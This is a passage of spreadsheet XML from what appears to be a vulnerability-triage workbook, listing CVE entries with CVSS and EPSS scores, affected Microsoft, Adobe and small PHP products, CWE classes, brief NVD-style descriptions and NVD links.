          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1848" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1848" s="5" t="inlineStr"/>
      <c r="K1848" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L1848" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1848" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81399</t>
        </is>
      </c>
    </row>
    <row r="1849">
      <c r="A1849" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1849" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81400</t>
        </is>
      </c>
      <c r="C1849" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1849" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1849" s="5" t="inlineStr"/>
      <c r="F1849" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1849" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1849" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1849" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1849" s="5" t="inlineStr"/>
      <c r="K1849" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1849" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1849" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81400</t>
        </is>
      </c>
    </row>
    <row r="1850">
      <c r="A1850" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1850" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81401</t>
        </is>
      </c>
      <c r="C1850" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1850" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1850" s="5" t="inlineStr"/>
      <c r="F1850" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1850" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1850" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t>
        </is>
      </c>
      <c r="I1850" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1850" s="5" t="inlineStr"/>
      <c r="K1850" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L1850" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1850" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81401</t>
        </is>
      </c>
    </row>
    <row r="1851">
      <c r="A1851" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1851" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81958</t>
        </is>
      </c>
      <c r="C1851" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1851" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1851" s="5" t="inlineStr"/>
      <c r="F1851" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1851" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1851" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1851" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1851" s="5" t="inlineStr"/>
      <c r="K1851" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L1851" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1851" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81958</t>
        </is>
      </c>
    </row>
    <row r="1852">
      <c r="A1852" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1852" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81977</t>
        </is>
      </c>
      <c r="C1852" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1852" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1852" s="5" t="inlineStr"/>
      <c r="F1852" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1852" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1852" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I1852" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1852" s="5" t="inlineStr"/>
      <c r="K1852" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L1852" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M1852" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81977</t>
        </is>
      </c>
    </row>
    <row r="1853">
      <c r="A1853" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1853" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81978</t>
        </is>
      </c>
      <c r="C1853" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1853" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1853" s="5" t="inlineStr"/>
      <c r="F1853" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1853" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1853" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I1853" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1853" s="5" t="inlineStr"/>
      <c r="K1853" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1853"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1853" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81978</t>
        </is>
      </c>
    </row>
    <row r="1854">
      <c r="A1854" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1854" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81982</t>
        </is>
      </c>
      <c r="C1854" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1854" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1854" s="5" t="inlineStr"/>
      <c r="F1854" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1854" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1854" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I1854" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1854" s="5" t="inlineStr"/>
      <c r="K1854" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1854"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1854" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81982</t>
        </is>
      </c>
    </row>
    <row r="1855">
      <c r="A1855" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1855" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81984</t>
        </is>
      </c>
      <c r="C1855" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1855" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1855" s="5" t="inlineStr"/>
      <c r="F1855" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1855" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1855" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I1855" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1855" s="5" t="inlineStr"/>
      <c r="K1855" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1855" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M1855" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81984</t>
        </is>
      </c>
    </row>
    <row r="1856">
      <c r="A1856" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1856" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81991</t>
        </is>
      </c>
      <c r="C1856" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1856" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1856" s="5" t="inlineStr"/>
      <c r="F1856" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1856" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1856" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I1856" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1856" s="5" t="inlineStr"/>
      <c r="K1856" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1856"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1856" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81991</t>
        </is>
      </c>
    </row>
    <row r="1857">
      <c r="A1857" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1857" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81993</t>
        </is>
      </c>
      <c r="C1857" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1857" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1857" s="5" t="inlineStr"/>
      <c r="F1857" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1857" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1857" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I1857" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1857" s="5" t="inlineStr"/>
      <c r="K1857" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1857" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Heap-based Buffer Overflow vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M1857" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81993</t>
        </is>
      </c>
    </row>
    <row r="1858">
      <c r="A1858" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1858" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82001</t>
        </is>
      </c>
      <c r="C1858" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1858" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1858" s="5" t="inlineStr"/>
      <c r="F1858" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1858" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1858" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I1858" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1858" s="5" t="inlineStr"/>
      <c r="K1858" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L1858" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to exhaust system resources, resulting in an application denial-of-service condition. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M1858" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82001</t>
        </is>
      </c>
    </row>
    <row r="1859">
      <c r="A1859" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1859" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83501</t>
        </is>
      </c>
      <c r="C1859" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1859" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1859" s="5" t="inlineStr"/>
      <c r="F1859" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1859" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1859" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1859" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1859" s="5" t="inlineStr"/>
      <c r="K1859" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1859" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1859" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83501</t>
        </is>
      </c>
    </row>
    <row r="1860">
      <c r="A1860" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1860" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83949</t>
        </is>
      </c>
      <c r="C1860" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1860" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1860" s="5" t="inlineStr"/>
      <c r="F1860" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1860" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1860" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I1860" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1860" s="5" t="inlineStr"/>
      <c r="K1860" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L1860" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Microsoft Office Word allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1860" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83949</t>
        </is>
      </c>
    </row>
    <row r="1861">
      <c r="A1861" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1861" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83951</t>
        </is>
      </c>
      <c r="C1861" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1861" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1861" s="5" t="inlineStr"/>
      <c r="F1861" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1861" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1861" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I1861" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1861" s="5" t="inlineStr"/>
      <c r="K1861" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L1861" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Microsoft Office Word allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1861" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83951</t>
        </is>
      </c>
    </row>
    <row r="1862">
      <c r="A1862" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1862" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83991</t>
        </is>
      </c>
      <c r="C1862" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1862" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1862" s="5" t="inlineStr"/>
      <c r="F1862" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1862" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1862"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862" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1862" s="5" t="inlineStr"/>
      <c r="K1862" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1862" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows Cloud Files Mini Filter Driver allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="M1862" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83991</t>
        </is>
      </c>
    </row>
    <row r="1863">
      <c r="A1863" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1863" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85875</t>
        </is>
      </c>
      <c r="C1863" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1863" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1863" s="5" t="inlineStr"/>
      <c r="F1863" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1863" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1863" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1863" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1863" s="5" t="inlineStr"/>
      <c r="K1863" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1863" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M1863" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85875</t>
        </is>
      </c>
    </row>
    <row r="1864">
      <c r="A1864" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1864" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86213</t>
        </is>
      </c>
      <c r="C1864" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1864" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1864" s="5" t="inlineStr"/>
      <c r="F1864" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1864" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H1864" s="5" t="inlineStr"/>
      <c r="I1864" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1864" s="5" t="inlineStr"/>
      <c r="K1864" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L1864" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Mstfakts College-Management-System. This issue affects the function mysqli_query of the file Front-end/university.php of the component Search Handler. The manipulation of the argument book_name/book_author results in sql injection. The attack may be performed from remote. The exploit has been made public and could be used. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="M1864" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86213</t>
        </is>
      </c>
    </row>
    <row r="1865">
      <c r="A1865" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1865" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86220</t>
        </is>
      </c>
      <c r="C1865" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1865" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1865" s="5" t="inlineStr"/>
      <c r="F1865" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1865" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H1865" s="5" t="inlineStr"/>
      <c r="I1865" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1865" s="5" t="inlineStr"/>
      <c r="K1865" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L1865" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in SourceCodester Class and Exam Timetabling System 1.0. The affected element is the function mysqli_query of the file /admin/modal_add_course.php. The manipulation of the argument course results in sql injection. The attack can be launched remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="M1865" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86220</t>
        </is>
      </c>
    </row>
    <row r="1866">
      <c r="A1866" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1866" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86221</t>
        </is>
      </c>
      <c r="C1866" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1866" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1866" s="5" t="inlineStr"/>
      <c r="F1866" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1866" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H1866" s="5" t="inlineStr"/>
      <c r="I1866" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1866" s="5" t="inlineStr"/>
      <c r="K1866" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L1866" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in SourceCodester Class and Exam Timetabling System 1.0. The impacted element is the function mysqli_query of the file /admin/modal_add_course1.php. This manipulation of the argument course causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="M1866" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86221</t>
        </is>
      </c>
    </row>
    <row r="1867">
      <c r="A1867" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1867" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86222</t>
        </is>
      </c>
      <c r="C1867" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1867" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1867" s="5" t="inlineStr"/>
      <c r="F1867" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1867" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H1867" s="5" t="inlineStr"/>
      <c r="I1867" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1867" s="5" t="inlineStr"/>
      <c r="K1867" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L1867" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in SourceCodester Class and Exam Timetabling System 1.0. This affects the function mysqli_query of the file /admin/modal_add_course2.php. Such manipulation of the argument course leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.</t>
        </is>
      </c>
      <c r="M1867" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86222</t>
        </is>
      </c>
    </row>
    <row r="1868">
      <c r="A1868" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1868" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86223</t>
        </is>
      </c>
      <c r="C1868" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1868" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1868" s="5" t="inlineStr"/>
      <c r="F1868" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1868" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H1868" s="5" t="inlineStr"/>
      <c r="I1868" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1868" s="5" t="inlineStr"/>
      <c r="K1868" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L1868" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in SourceCodester Class and Exam Timetabling System 1.0. This impacts the function mysqli_query of the file /admin/modal_add_coursea.php. Performing a manipulation of the argument course results in sql injection. Remote exploitation of the attack is possible. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="M1868" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86223</t>
        </is>
      </c>
    </row>
    <row r="1869">
      <c r="A1869" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1869" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86224</t>
        </is>
      </c>
      <c r="C1869" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D1869" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1869" s="5" t="inlineStr"/>
      <c r="F1869" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1869" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H1869" s="5" t="inlineStr"/>
      <c r="I1869" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1869" s="5" t="inlineStr"/>
      <c r="K1869" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="L1869" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in SourceCodester Class and Exam Timetabling System 1.0. Affected is the function mysqli_query of the file /admin/modal_add_product.php. Executing a manipulation of the argument fname can lead to sql injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized.</t>
        </is>
      </c>
      <c r="M1869" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86224</t>
        </is>
      </c>
    </row>
    <row r="1870">
      <c r="A1870" s="5" t="inlineStr">
        <is>
